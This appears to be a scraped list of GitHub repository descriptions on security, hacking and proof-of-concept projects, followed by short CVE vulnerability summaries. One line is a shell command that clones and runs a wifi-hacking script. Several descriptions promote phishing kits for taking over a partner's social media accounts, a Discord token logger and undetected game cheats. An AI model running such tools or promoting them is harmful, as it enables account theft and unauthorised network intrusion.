Projeto para aprender spring boot security na versã0 3.0.2
Initial commit
Software-Security-Project
HealthGuard-A-Machine-Learning-Based-Security-Framework-for-Smart-Healthcare-Systems
First Web Application without spring security
Hacking_Neural_Networks
spring-security-tutorial
Proof-of-concept Glowbox in Docker (for compatibility with non-Windows operating systems)
A basic assault cube game for learning how memory in game hacking works :)
A proof of concept to show egui running with glfw/glow/lua on emscripten backend
Proof of concept work on installing Wordpress on AWS
build a Reddit clone from scratch using React, Firebase, Next.js, Chakra UI, and TypeScript. The application features authentication, Firestore database, cloud functions, security rules, Transactions, deployment, and more.
Raspberry Pi security Camera with video recordings
Proof-of-concept implementation and benchmarks of efficient registration-based encryption (RBE) [GKMR]
Developing a package that scrapes, stores and cleans data of the Braziliam Ministry of Labor and Social Security's Register of Employed and Unemployed Persons (CAGED)
Hacker, code, DDos, WinLocker
Proof of concept aimed to test creating archive on client side
http-hacking
Proof of concept grafana plugin for MVP integration
Hacking Tools Launcher... >>!Work In Progress!<< - [=| use for education purpuse only |=]
IHP WebSockets Proof-of-Concept
One tap is a valorant hack that i created myself with features like aimbot esp and some more
Proof of concept of using my parserly library
AI‑based Voice assistant incorporated with 30+ different commands like Price Drop Alerts, Certificate generator, Finding location of place, Games, Security Surveillance and motion detection, Weather Report. Different modules such as Wolfram Alpha, Subproc
Pentesting Hacking Tools, Scripts, Windows, Linux,
A python program for educational purposes aimed at studying cryptography and hacking techniques
Here are my high school cyber security workshop notes. I will continue to add as I learn. Good to hack :)
COD Warzone Hack Cheat Exclusive and Undetected for PC
Only for white-cap hackers!
This is a proof of concept and shouldn't be used...
A web application that allows users to submit secrets. This project explores different levels of security and implements Oauth.
Dayz-Hack-Aimbot-ESP-Wallhack-Radar-Hack-and-more
cryptography-and-network-security-CSA15
Updated-Hack-for-Fortnite-AIM-ESP-MISC
Escape-From-Tarkov-Cheat-Undetected-with-Aimbot-ESP-Wallhack-Radar-hack-and-more
Sample Spring MVC application with two alternatives of data access (Spring ORM & Spring Data JPA) and HTTP Basic Authentication based on Spring Security
Proof of concept demo of ticket dispatch using React/Firestore/NextJS
Junk drawer of routines and helpers to speed along Go projects, often proof-of-concepts.
spring-security-az
APTOPLAY - Aptos Seoul Hack 2023 Buidle
Application Hibernate pour la sécurité
security
Proof of concept for CVE-2022-44311
Wifi Hacking Commands in Kali linux 2021
TerminatorZ is a highly sophisticated and efficient web security tool that scans for top potential vulnerabilities in your web applications.
Compilation of the best hacker tools
[Proof of Concept] This gem injects checks and deprecations for future Rails version in the current app.
Proof of concept for CVE-2022-36752
Microcontroller Based System Design(Hardware Project)
The proof of concept project having Graph API subscription handling on SharePoint document library
A .net MAUI proof of concept
Proof of concept for CVE-2022-41220
COD Warzone Hack Cheat Exclusive and Undetected for PC
Proof of concept that pythonnet allows using Python package of SaxonC 12 HE (saxonche) in .NET code
Ethical_Hacking_with_Python
Proof of concept for CVE-2022-34913
Dayz-Hack-Aimbot-ESP-Wallhack-Radar-Hack-and-more
Docker and Kubernetes security talk on tools and processes that will improve your posture
Convert OpenVINO IR to Python script, hack it or update something, and then convert back to IR.
This is a Proof of Concept to cipher and decrypt files using PKI
Addon for meteor to get better starscript
This is the proof of concept repository for the automated test
Escape-From-Tarkov-Cheat-Undetected-with-Aimbot-ESP-Wallhack-Radar-hack-and-more
Hacking
apt update apt upgrade apt install git git clone https://github.com/esc0rtd3w/wifi-hacker ls cd wifi-hacker ls chmod +x wifi-hacker.sh ls ./wifi-hacker.sh
SilkWare-Apex-Legends-Hack-ESP-Aimbot-Free
hack-uの練習
checks various security features of a system, including firewall, intrusion detection system (IDS),Intrusion Prevention Systems (IPS), Network Security Groups (NSG) antivirus, log4js & More.
Verifier written in Go for a bachelor project at Aarhus University in the cryptography and security group.
spring-security-3_1_3
Proof of concept for CVE-2022-34556
An Nginx configuration file for optimal security.
our work in the labs in 2023
Build a proof of concepts e-commerce store using Angular15, .Net7, and Stripe for payment processing.
Python for programming and security purposes
A simple tool for hacking an instagram accounts
Repository created to keep the whole code of proof of concept using data lakehouse.
Simple Steganography Tool In Perl
CertWatcher is a tool for capturing and tracking certificate transparency logs, using YAML templates and Selenium. The tool helps to detect and analyze phishing sites, and is designed to make it easy to use for security professionals and researchers.
Python application to ensure verified release of students from school
Proof of concept for ICSA-19-113-01
security-demo
Spring Framework & Spring Boot: Thymeleaf, JPA, Security, REST, MySQL, Angular, WebFlux.
Proof of concept for CVE-2022-36234
security-application
This is an extremely rough proof of concept for a client auth API for the Learnosity SDK written in GoLang.
proof of concept study to classify spices by images
security-master-salting
Proof Of Concept - OpenTelemetry CPP Integration
jpa-security
Poryecto-11--Ethical-Hacking-
I am not a hacker but i am mastar of hcker
Hack a mouse to build your own micromouse
This project learn about authentication & Security
login,logout
Basic Spring Boot application with security with JWT token stored in cookie
yet another 256-bit SHA hack
Test repo before I show everyone at Brick Hacks
A Proof of Concept for hosting a simple web application on AWS using Lambda, DynamoDB, CloudFormation and GitHub Actions.
The proof of concept project having Graph API subscription handling on SharePoint document library
repo-10675-akamai-security-research
hacking-minigame
more blooket hacks
This is a proof of concept. AGAIN
ITA1445-Ethical-hacking
Bot do Discorda obsługujący kanał RSS, w tym wypadku "The Hacker News".
APTOPLAY - Aptos Seoul Hack 2023 Buidle
Proof-of-Concept Python programs I've made.
SpringSecurity
The 12th project of "100 Days of SwiftUI" tutorial course from Paul Hudson's "Hacking with Swift" website. A technique project focused on Core Data framework in more detail. Complete project; it includes last example of the project and modified SwiftUI vi
MS Open Hack AKS
Proof of concept user mode anti-cheat
Python tools for hacking
Proof of concept for M.E.C. project's front
Test-Task-6-Upload-and-Download-File-with-Spring-Security
h2 Goat This is the homework 2 for information security lesson
Spring security in action 책 공부
Spring Security
learning: information security with helmet js
proof of concept
learning from amigoscode
Registration_Login-Spring-Security-Thymeleaf
https://sched.co/1FV4H
Hacker News API JAVA backend implementation
spring-security-jwt
A chrome extension to browse sites without signing in and clear all of their annoying hacks [blur, overflow, overlays etc.]
PP_3_1_3_BootSecurity
This room provides an introduction to DevOps pipeline automation and the potential security concerns.
网络安全知识星球免费开放,邀请大家加入~
Includes Security, Cryptology and Hacking tools.
ComputerSecurity
Authentication-Security
repo-4860-SweetSecurity
repo-9065-HackingWithSwift
A simple application of a information security services provider.
Security-Intelligence-Toolkit-iOS-Barone-Mahr
MicrosoftSecurityUpdates
software-security-sdlc-projects
This Proof of Concept (POC) was created as a minimal API project with a skeleton app including components needed for a .NET 7.0 Minimal API using Endpoints instead of legacy controllers. It can serve as a starting point for new API projects.
SpringSecurity
Proof of concept, not production-quality code
API Security for WordPress
awi_security
Junk drawer of NATS-specific routines and helpers to speed along Go projects, often proof-of-concepts.
Hacker news V2
usage of multiple levels of authentication in each new commit the the security gets stronger, in the final code we see usage of oauth and 3 party authentication
ITA-1145-Ethcal-hacking
information safety
repo-5275-RMS-Runtime-Mobile-Security
Crud with SpringData, SpringSecurity and Internationalization
제1회 지역 치안 안전 데이터 분석 경진대회를 위한 repository 입니다
Repository for bunch of tools for hacking, threat intelligence, etc.
security
java-spring-boot-3-security6
dotnet Security Library
C# library to easily cryptograph and decryptograph text with security and a high level of abstraction.
ITA14-Ethical-hacking
Hackers Poulette Exercise
Code for William & Mary CHIN 370
I will explain how to secure an AWS account without extra costs or minimum costs or how to save money to enable security services.
The "customcaptcha" repository creates a custom captcha system for improved security and user experience.
autobahn-security
Todo list of WTF Academy StarkNet during StarkNet Building Hacker House Tel Aviv, 31st Jan-7th Feb, 2023.
A Hacker News clone using Alpine.js
Authentication-Security
A proof-of-concept LCF-style interactive theorem prover for HOL(C)
Made for the GM Project at TAMU Hack 23!
ODU CS 495/595 Web Security
Demonstrating good practices with security chain filters. Authentication consists of filters that validate and refresh JWT tokens, and validate user credentials. This approach implements AuthenticationManager and AuthenticationEntryPoint that handle valid
PP_3_1_3_Boot_Security
Use Pangea APIs with Auth0 authentication to verify user is not from a suspicious IP
ETHICAL-HACKING
Angular task displaying trending hacker news
Creates more secure security settings for DietPi Linux.
Authentication & security. 6 levels. Coding practice.
A proof of concept for connecting to and manipulating a PostgreSQL database.
ITA1446-ETHICAL-HACKING
Draft Policy for Cloud GRC best practices. You can take and tailor it as you please!
Material referente ao curso Spring Boot Expert: JPA, RESTFul API, Security, JWT e Mais
SEC-440-01-Systems-Security
Sen6tive is a Sensitive files and directory finding tool and it will be a useful tool for security professionals as it can help to identify and locate sensitive files and directories on a network. This can be useful for security assessments, penetration t
Just a naive and simple Proof of Concept of how to implement a Product Service for managing catalogs of products
TESTED BY ME! BUT IM STILL NOT RESPONSIBLE FOR AANY DAMAGES OF ANY SORT.
Revolutionizing your workflow with the power of AI - Nw Hacks 2023 Finalist🎉
spring-security-tutorial-2023
WIP nikprog.hu remake with identity management, logging, and several security measures.
DogHotel_springBoot_Security
variamos_ms_security_requirements_autocomplete
security-metrics
Template repository for creating proof of concepts
An app made in our effort to make toys more accessible as well as affordable to the kids as a part of our project in Red Brick hacks 2022
An IP camera, also known as a network camera, is a type of digital video camera that can be accessed over a network connection. These cameras are typically used for surveillance, security, and monitoring purposes.
1/2 day training workshop - Intro into Cyber Security Operations
A proof-of-concept created for academic/learning purposes, demonstrating both local and remote use of VSTO "Add-In's" maliciously
Mobile Security Project
S.E.A.L-Security-
This project aims to explore the vulnerabilities of software systems through the use of buffer overflow and SQL injection attacks. These types of attacks are commonly used by malicious actors to gain unauthorized access to sensitive information, disrupt s
ApiJavaWithSpringSecurity
A collection of security projects
Cannedbi Tech jobs at Aptos Seoul Hack 2023
A series of lab sessions for the students of the PhD course on Deep Learning for Network Security
Financial web app "Wealth Smart" enables users to manage securities in a watchlist and simulate trades with the U.S stock market
Virtual lab setup for Corey Ball's "Hacking APIs" book.
A web application for posting anonymous messages. This project centered around 7 different levels of security and authentication using hashing, cookies, Google & Facebook OAuth, and more.
CyberSecurityStuff
ucsc-security.github.io
spring-security-oauth2
contributors-Mj-Computer-System-Security
A curated list of daily learnings, writeups, blogs, tips and everything related to hacking
Hacked By WinnnTzy
bypass 403 responses (or try to). you can bypass other responses as well (or try to).
Capstone hack and slash game of my Grade 12 year - built in Unity using C#
Legal Docs
Website for the upcoming BVICAM's Hack-BVICAM Hackathon. Also hosted on https://bvicam.ac.in/hack-bvicam/
Third project of Information Security course.
Cryptography-and-Security
Mark is a personal assistant for hackers.
A 1.8.8 hacked client coded by mkeo102
I share the most valuable cybersecurity learning materials and open-source security tools for Application Vulnerability Assessments, Penetration Testing, Reverse Engineering, Source Code, Phishing and Social Engineering, and Malware Analysis.
cluster-security-risk-analyze-system
This repository is part of EU-funded Research Project (XANDAR)
Second project of Information Security course.
A Man In The Middle attack in Python (for a school project). DON'T USE IT FOR BAD PURPOSES
Use Pangea APIs with Auth0 authentication to verify user is not from a suspicious domain
Use Pangea APIs with Auth0 authentication to verify user is not from Embargoed Country
First project of Information Security course.
proof of concept betting contract
ContainerSecurity
Check e-book files for security and privacy issues.
A website that will be used for expanding my knowledge in cyber security
Hack space for release testing
Using a webcam, USB Relay and hacked slide projector to record slides.
Security Analysis Tool (SAT) analyzes customer's Databricks account and workspace security configurations and provides recommendations that help them follow Databrick's security best practices. When a customer runs SAT, it will compare their workspace con
Minimal server (with maximal security) for turning off an X10-controlled fan over HTTP
TerraOak-GCP is Oak9's vulnerable IAC code repo for GCP. This repo will be used for learning and training purposes on how to implement a cloud security posture for GCP.
Repository to locate the GitHub security action named Tizona.
Testing hacks and stuffs for blooket
GraphQL @auth directive that protects resources from unauthenticated and unauthorized access
Dark Web Informationgathering Footprinting Scanner and Recon Tool Release. Dark Web is an Information Gathering Tool I made in python 3. To run Dark Web, it only needs a domain or ip. Dark Web can work with any Linux distros if they support Python 3. Aut
安全相關
cxf_security_samples
AWS Security Compliance and Operations Toolkit
SLO proof of concepts and research documents
Wordlists (usernames, passwords, host IPs) captured by my oSSH cluster.
Issue Repo for Pixelmon Hacks ( https://www.curseforge.com/minecraft/mc-mods/pixelmon-utilities )
aws-security-research
This repository contains security policies for cnspec maintained by Mondoo and the cnspec community.
Swift-100DaysHackingWithSwift
Proof-of-Concept code snippets for a variety of different process injection techniques
A curated list of tools and resources that I use daily as a Purple-Team operator.
Cardfight Vanguard Plug-In for the Multi-TCG Deck Builder Application. This Plug-In won't be updated, and does not have the complete cardlist. It is built as a proof of concept. https://github.com/Eronan/Multi-TCG-Deckbuilder
Java spring boot backend for the DADY-Academy website for calculations and tools in Physics, Biology, Statistics, and Chemistry.
Cyber-Security
Kernl lets you run PyTorch transformer models several times faster on GPU with a single line of code, and is designed to be easily hackable.
Interface for Hacker News (React, Redux, React Router v6)
Proof of Concept page of my Xonotic map repo frontend
security-vulnerability-examples-next-js-postgres
Year 2-3 Markdown Notes for Singapore Polytechnic Diploma in Infocomm Security Management (No Year 1 notes because they're handwritten)
This is a minimal starter dual-CPU security application template for PSoC™ 62/63 MCU devices. This code example is meant to be a companion to the AN221111 – PSoC™ 6 MCU: Designing a secured system application note. It demonstrates the following features t
A collection of various awesome lists for hackers, pentesters and security researchers. With repository stars⭐ and forks🍴
A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools and more. With repository stars⭐ and forks🍴
External multi-hack for HardWar UIM6. Uses memory modification to implement cheats; written in C++.
Modern theme for Hackers, with dark colors - Inspired from the UI of Hackthebox
Happy hacking for ORPHE CORE module on javascript.
Este é o meu site pessoal. Aqui procuro refletir de tudo um pouco sobre mim: trabalho, universidade, projetos, coisas que gosto em geral.
A curated list of awesome search engines useful during Penetration testing, Vulnerability assessments, Red/Blue Team operations, Bug Bounty and more
JWT-based Spring security REST API
Home camera security system
Data/data security class
Crosshair Online Game Anti Hack System
My files for security assessments, bug bounty and more
CI tooling and hacks to improve CI
AI-Security-Papers
Hacker News client for iPhone, planned for all Apple devices.
An example MuleSoft Anypoint project with Fortify Static Code Analyzer custom rules
Project with intentional vulnerabilities to test GitHub's CodeQL security scanning.
galaxy-hacking
Blog for my stuff
Venia/WKND proof of concept for a Tag property
A Clean Dark Hacker Theme For VS Code
Network observability for Kubernetes
Best Tool for Phishing With 38+ templates , Now you can Hack your Girlfreind or Boyfreind Instagram or Facebook account by jus a single link ! HAVE FUN 🔴🔴🔴🔴🔴✔
Proof-Of-Concept for a discord tokenlogger. (Tampermonkey Script / Browser Extension)
Proof of concept 2D tile game written in Java using LWJGL v3.
Stats about HTTP response security headers usage mentioned by the OSHP.
The idea of this repo is to execute a script that setups all the my needed tools for Kali Linux
The projects and materials that accompany the Hack Your Job Search book
A proof-of-concept, annotating a IIIF manifest with Zooniverse classification data.
A high level overview of the OWASP Top 10 Application Security Risks.
Metatron Corporation is a security and defense company.
/NetHack is a hacking tool that allows a user to use it on a target computer, to get network informations.
Proof-of-concept Kodi plugin for Eurosport Player
bit hacks and basic compiler_rt in Zig optimized for 2s complement and verified in Z3
A proof of concept for OAuth 2.0
All hacks for blooket
Miami Hack Week
A heavily armed customizable phishing tool for educational purpose only
记录一些每天看到的技术来自微信公众号及个人博客
A full module with a wide variety of Windows security checks, findings, and fixes.
A security framework for JavaScript or TypeScript.
Personel note repo containing computer and security related notes.
A tree-walk interpretation implementation of Iqalox language in Kotlin as a proof-of-concept
A weekend hack to provide test data for web content management.
Cross-platform GUI written in Rust using ADB to debloat non-rooted android devices. Improve your privacy, the security and battery life of your device.
google_hacking
SecurityTokenService
Authenticode-parser is a simple C library for Authenticode format parsing using OpenSSL.
Modern camera app focused on privacy and security with QR & barcode scanning.
Framework for Structure Aware Fuzzing. Allows to build own stamps that would convert pulp-data that came from fuzzer to data with structure you need
Easy and secure implementation of Azure AD for your FastAPI APIs 🔒 B2C, single- and multi-tenant support.
Managed app for the host-based intrusion detection agent Falco.
Hacking and cracking
Respuestas de Hacker Rank Python
"Can I take over DNS?" — a list of DNS providers and how to claim (sub)domains via missing hosted zones
Kestrel threat hunting language: building reusable, composable, and shareable huntflows across different data sources and threat intel.
Collection of knowledge about information security
A Kubernetes admission webhook to ensure pod security standards
Some security tips by experience or from internet knowledge
Curated list of classic fuzzing books, papers about fuzzing at information security top conferences over the years, commonly used fuzzing tools, and resources that can help us use fuzzer easily.
A GitHub Action for running Parasoft C/C++test analysis
Light LDAP implementation
A Terminal UI to browse Hacker News
A custom shell for running commands like a true hacker
Applied offensive security with Rust - https://kerkour.com/black-hat-rust
This is a Proof of Concept, about how to create microservices using NodeJS, Express and React. This project contains a monorepo which represents the microservices to manage a blog website.
Verify the configuration of your macOS machine.
A Web Security repository to facilitate your search for sites related to the area through the concept of resource inventory.
Proof of concept for an idea I had based on the powder game. Taking a backseat to other projects. Demo https://www.youtube.com/watch?v=qyF1r8bcwng
An effective, simple, and async security library for the Sanic framework.
This project provides a Proof of Concept (PoC) implementation of the Lightweight CMP Profile for CMP [RFC 4210].
Thao M. Dang's official repo.
The most flexible and standards-compliant OpenID Connect and OAuth 2.x framework for ASP.NET Core
Information Gathering tool - DNS / Subdomains / Ports / Directories enumeration
Security
Solutions to hacker rank challenges
An AWS tool to help you create a point in time assessment of your AWS account using Prowler and Scout as well as optional AWS developed ransomware checks.
🤖 The Modern Port Scanner 🤖
This is my journey into CTF, from my introduction into ethical hacking, covering the tools and competitions that I now engage with and thoroughly enjoy.
Guard offers a policy-as-code domain-specific language (DSL) to write rules and validate JSON- and YAML-formatted data such as CloudFormation Templates, K8s configurations, and Terraform JSON plans/configurations against those rules.
security-admin
E-Mail-Security
A checklist for staying safe on the internet in Persian
Simple roadmap visualization proof of concept
Identify .NET (Framework) security configurations issues in web.config files
github action to run the bandit security linter
Python Hacking Projects (Network Scanner, Mac Changer, Sniffers, ARP Spoofing, Backdoor, Keyloggers...)
Spring security sample project
Ansible Role for Mondoo Client
LDIF files created from the Marvel API.
A collection of tools/scripts that I use for hacking/CTFs/RE projects, etc.
Auditor app prebuilt using the latest official release of the Auditor app.
Mikrotik initrd hacks
A curated list of open-source projects that help exploit Intel SGX technology
FE8 hack recreating BS Fire Emblem
Content Security Policy Reporting Endpoint
WordPress plugin that integrates your WordPress site with the Bluehost control panel, including performance, security, and update features.
The continuation of BASE (Basic Analysis and Security Engine), by @secureideas, et al. A web app to query and analyze alerts coming from a SNORT IDS.
Protecting your website users with Content Security Policies made easiest and manageable with reports, management interface and SubResource Integrity generation and easy set-up of reporting to Sentry or security-headers
Gorsair gives root access on remote docker containers that expose their APIs
A Vault swiss-army knife: a K8s operator, Go client with automatic token renewal, automatic configuration, multiple unseal options and more. A CLI tool to init, unseal and configure Vault (auth methods, secret engines). Direct secret injection into Pods.
Blue Hydra
SSH server & client auditing (banner, key exchange, encryption, mac, compression, compatibility, security, etc)
Source code of the MONARC website.
Wazuh - Ansible playbook
Android Key Attestation validation library
Collection of the cheat sheets useful for pentesting
The official repo for Blokada apps.
Security library for JAX-RS and Jersey
A Dropwizard bundle for securing REST endpoints using pac4j
Write Linux kernel drivers from scratch and hacking
Generate an RSS feed containing all of the episodes of the Security Now podcast
Transmits AM radio on computers without radio transmitting hardware.
XML Security Library
A unique security module for the Linux operating system
Slim(toolkit): Don't change anything in your container image and minify it by up to 30x (and for compiled languages even more) making it secure too! (free and open source)
Prisoner Money Intelligence – Security staff facing site for Prisoner Money suite of apps
Android Proof of Concept Implementation
Nishang - Offensive PowerShell for red team, penetration testing and offensive security.
Security, performance, marketing, and design tools — Jetpack is made by WordPress experts to make WP sites safer and faster, and help you grow your traffic.
Security provides an infrastructure for sophisticated authorization systems, which makes it possible to easily separate the actual authorization logic from so called user providers that hold the users credentials. It is inspired by the Java Spring framewo
JEE demo to test the jee-pac4j security library
Zuul is a gateway service that provides dynamic routing, monitoring, resiliency, security, and more.
:coffee: SonarSource Static Analyzer for Java Code Quality and Security
Mirror of FreeIPA, an integrated security information management solution
The security system is one of the most powerful parts of Symfony and can largely be controlled via its configuration.
[DEPRECATED] The Security component provides a complete security system for your web application.
A collection of small hacks I wrote over the years
A support library for Ronin. Like activesupport, but for hacking!
CVE-2022-38389 -- IBM Tivoli Workload Scheduler 9.4, 9.5, and 10.1 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X
CVE-2023-0658 -- A vulnerability, which was classified as critical, was found in Multilaser RE057 and RE170 2.1/2.2. This affects an unknown part of the file /param.file.tgz of the component Backup File Handler. The manipulation leads to information disclosure. It is poss
CVE-2020-24307 -- An issue in mRemoteNG v1.76.20 allows attackers to escalate privileges via a crafted executable file.
CVE-2022-2546 -- The All-in-One WP Migration WordPress plugin before 7.63 uses the wrong content type, and does not properly escape the response from the ai1wm_export AJAX action, allowing an attacker to craft a request that when submitted by any visitor will inject arbit
CVE-2022-33323 -- Active Debug Code vulnerability in robot controller of Mitsubishi Electric Corporation industrial robot MELFA SD/SQ Series and MELFA F-Series allows a remote unauthenticated attacker to gain unauthorized access by authentication bypass through an unauthor
CVE-2022-3560 -- A flaw was found in pesign. The pesign package provides a systemd service used to start the pesign daemon. This service unit runs a script to set ACLs for /etc/pki/pesign and /run/pesign directories to grant access privileges to users in the 'pesign' grou
CVE-2022-36401 -- Cross-Site Request Forgery (CSRF) vulnerability in TeraWallet – For WooCommerce plugin <= 1.3.24 versions.
CVE-2022-40268 -- Improper Restriction of Rendered UI Layers or Frames vulnerability in Mitsubishi Electric Corporation GOT2000 Series GT27 model versions 01.14.000 to 01.47.000, Mitsubishi Electric Corporation GOT2000 Series GT25 model versions 01.14.000 to 01.47.000 and
CVE-2022-40269 -- Authentication Bypass by Spoofing vulnerability in Mitsubishi Electric Corporation GOT2000 Series GT27 model versions 01.14.000 to 01.47.000, Mitsubishi Electric Corporation GOT2000 Series GT25 model versions 01.14.000 to 01.47.000 and Mitsubishi Electric
CVE-2022-40692 -- Cross-Site Request Forgery (CSRF) vulnerability in WP Sunshine Sunshine Photo Cart plugin <= 2.9.13 versions.
CVE-2022-43665 -- A denial of service vulnerability exists in the malware scan functionality of ESTsoft Alyac 2.5.8.645. A specially-crafted PE file can lead to killing target process. An attacker can provide a malicious file to trigger this vulnerability.
CVE-2022-44585 -- Cross-Site Request Forgery (CSRF) vulnerability in Magneticlab Sàrl Homepage Pop-up plugin <= 1.2.5 versions.
CVE-2022-45067 -- Cross-Site Request Forgery (CSRF) vulnerability in DevsCred Exclusive Addons Elementor plugin <= 2.6.1 versions.
CVE-2022-45807 -- Cross-Site Request Forgery (CSRF) in WPVibes WP Mail Log plugin <= 1.0.1 versions.
CVE-2022-46552 -- D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remote command execution (RCE) vulnerability via the lan(0)_dhcps_staticlist parameter. This vulnerability is exploited via a crafted POST request.
CVE-2022-46604 -- An issue in Tecrail Responsive FileManager v9.9.5 and below allows attackers to bypass the file extension check mechanism and upload a crafted PHP file, leading to arbitrary code execution.
CVE-2022-46815 -- Cross-Site Request Forgery (CSRF) vulnerability in Lauri Karisola / WP Trio Conditional Shipping for WooCommerce plugin <= 2.3.1 versions.
CVE-2022-46842 -- Cross-Site Request Forgery (CSRF) vulnerability in JS Help Desk plugin <= 2.7.1 versions.
CVE-2022-46965 -- PrestaShop module, totadministrativemandate before v1.7.1 was discovered to contain a SQL injection vulnerability.
CVE-2022-48079 -- Monnai aaPanel host system v1.5 contains an access control issue which allows attackers to escalate privileges and execute arbitrary code via uploading a crafted PHP file to the virtual host directory of the system.
CVE-2022-48082 -- Easyone CRM v5.50.02 was discovered to contain a SQL Injection vulnerability via the text parameter at /Services/Misc.asmx/SearchTag.
CVE-2022-48113 -- A vulnerability in TOTOLINK N200RE_v5 firmware V9.3.5u.6139 allows unauthenticated attackers to access the telnet service via a crafted POST request. Attackers are also able to leverage this vulnerability to login as root via hardcoded credentials.
CVE-2022-48114 -- RuoYi up to v4.7.5 was discovered to contain a SQL injection vulnerability via the component /tool/gen/createTable.
CVE-2022-48130 -- Tenda W20E v15.11.0.6 was discovered to contain multiple stack overflows in the function formSetStaticRoute via the parameters staticRouteNet, staticRouteMask, staticRouteGateway, staticRouteWAN.
CVE-2022-48140 -- DedeCMS v5.7.97 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /file_manage_view.php?fmdo=edit&filename.
CVE-2023-0253 -- The Real Media Library: Media Library Folder & File Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via folder names in versions up to, and including, 4.18.28 due to insufficient input sanitization and output escaping. This makes
CVE-2023-0400 -- The protection bypass vulnerability in DLP for Windows 11.9.x is addressed in version 11.10.0. This allowed a local user to bypass DLP controls when uploading sensitive data from a mapped drive into a web email client. Loading from a local driver was corr
CVE-2023-0576 -- Server-Side Request Forgery (SSRF), Improperly Controlled Modification of Dynamically-Determined Object Attributes, Improper Restriction of Excessive Authentication Attempts vulnerability in Yugabyte DB allows Accessing Functionality Not Properly Constrai
CVE-2023-0634 -- An uncontrolled process operation was found in the newgrp command provided by the shadow-utils package. This issue could cause the execution of arbitrary code provided by a user when running the newgrp command.
CVE-2023-0637 -- A vulnerability, which was classified as critical, was found in TRENDnet TEW-811DRU 1.0.10.0. This affects an unknown part of the file wan.asp of the component Web Management Interface. The manipulation leads to memory corruption. It is possible to initia
CVE-2023-0638 -- A vulnerability has been found in TRENDnet TEW-811DRU 1.0.10.0 and classified as critical. This vulnerability affects unknown code of the component Web Interface. The manipulation leads to command injection. The attack can be initiated remotely. The explo
CVE-2023-0639 -- A vulnerability was found in TRENDnet TEW-652BRP 3.04b01 and classified as problematic. This issue affects some unknown processing of the file get_set.ccp of the component Web Management Interface. The manipulation of the argument nextPage leads to cross
CVE-2023-0640 -- A vulnerability was found in TRENDnet TEW-652BRP 3.04b01. It has been classified as critical. Affected is an unknown function of the file ping.ccp of the component Web Interface. The manipulation leads to command injection. It is possible to launch the at
CVE-2023-0641 -- A vulnerability was found in PHPGurukul Employee Leaves Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file changepassword.php. The manipulation of the argument newpassword/con
CVE-2023-0642 -- Cross-Site Request Forgery (CSRF) in GitHub repository squidex/squidex prior to 7.4.0.
CVE-2023-0643 -- Improper Handling of Additional Special Element in GitHub repository squidex/squidex prior to 7.4.0.
CVE-2023-0646 -- A vulnerability classified as critical was found in dst-admin 1.5.0. Affected by this vulnerability is an unknown functionality of the file /home/cavesConsole. The manipulation of the argument command leads to command injection. The attack can be launched
CVE-2023-0647 -- A vulnerability, which was classified as critical, has been found in dst-admin 1.5.0. Affected by this issue is some unknown functionality of the file /home/kickPlayer. The manipulation of the argument userId leads to command injection. The attack may be
CVE-2023-0648 -- A vulnerability, which was classified as critical, was found in dst-admin 1.5.0. This affects an unknown part of the file /home/masterConsole. The manipulation of the argument command leads to command injection. It is possible to initiate the attack remot
CVE-2023-0649 -- A vulnerability has been found in dst-admin 1.5.0 and classified as critical. This vulnerability affects unknown code of the file /home/sendBroadcast. The manipulation of the argument message leads to command injection. The attack can be initiated remotel
CVE-2023-0650 -- A vulnerability was found in YAFNET up to 3.1.11 and classified as problematic. This issue affects some unknown processing of the component Signature Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploi
CVE-2023-0651 -- A vulnerability was found in FastCMS 0.1.0. It has been classified as critical. Affected is an unknown function of the component Template Management. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The exploit
CVE-2023-23110 -- An exploitable firmware modification vulnerability was discovered in WNR612v2 Wireless Routers firmware version 1.0.0.3 and earlier. The data integrity of the uploaded firmware image is ensured with a fixed checksum number. Therefore, an attacker can cond
CVE-2023-23110 -- An exploitable firmware modification vulnerability was discovered in certain Netgear products. The data integrity of the uploaded firmware image is ensured with a fixed checksum number. Therefore, an attacker can conduct a MITM attack to modify the user-u
CVE-2023-23119 -- The use of the cyclic redundancy check (CRC) algorithm for integrity check during firmware update makes Ubiquiti airFiber AF2X Radio firmware version 3.2.2 and earlier vulnerable to firmware modification attacks. An attacker can conduct a man-in-the-middl
CVE-2023-23120 -- The use of the cyclic redundancy check (CRC) algorithm for integrity check during firmware update makes TRENDnet TV-IP651WI Network Camera firmware version v1.07.01 and earlier vulnerable to firmware modification attacks. An attacker can conduct a man-in-
CVE-2023-24574 -- Dell Enterprise SONiC OS, 3.5.3, 4.0.0, 4.0.1, 4.0.2, contains an "Uncontrolled Resource Consumption vulnerability" in authentication component. An unauthenticated remote attacker could potentially exploit this vulnerability, leading to uncontrolled resou
CVE-2023-25012 -- The Linux kernel through 6.1.9 has a Use-After-Free in bigben_remove in drivers/hid/hid-bigbenff.c via a crafted USB device because the LED controllers remain registered for too long.
CVE-2023-25013 -- An issue was discovered in the femanager extension before 5.5.3, 6.x before 6.3.4, and 7.x before 7.1.0 for TYPO3. Missing access checks in the InvitationController allow an unauthenticated user to set the password of all frontend users.
CVE-2023-25014 -- An issue was discovered in the femanager extension before 5.5.3, 6.x before 6.3.4, and 7.x before 7.1.0 for TYPO3. Missing access checks in the InvitationController allow an unauthenticated user to delete all frontend users.
CVE-2023-25015 -- Clockwork Web before 0.1.2, when Rails before 5.2 is used, allows CSRF.
CVE-2021-22786 -- A CWE-200: Information Exposure vulnerability exists that could cause the exposure of sensitive information stored on the memory of the controller when communicating over the Modbus TCP protocol. Affected Products: Modicon M340 CPU (part numbers BMXP34*)
CVE-2021-3439 -- HP has identified a potential vulnerability in BIOS firmware of some Workstation products. Firmware updates are being released to mitigate these potential vulnerabilities.
CVE-2021-3809 -- Potential security vulnerabilities have been identified in the BIOS (UEFI Firmware) for certain HP PC products, which might allow arbitrary code execution. HP is releasing firmware updates to mitigate these potential vulnerabilities.
CVE-2022-2329 -- A CWE-190: Integer Overflow or Wraparound vulnerability exists that could cause heap-based buffer overflow, leading to denial of service and potentially remote code execution when an attacker sends multiple specially crafted messages. Affected Products: I
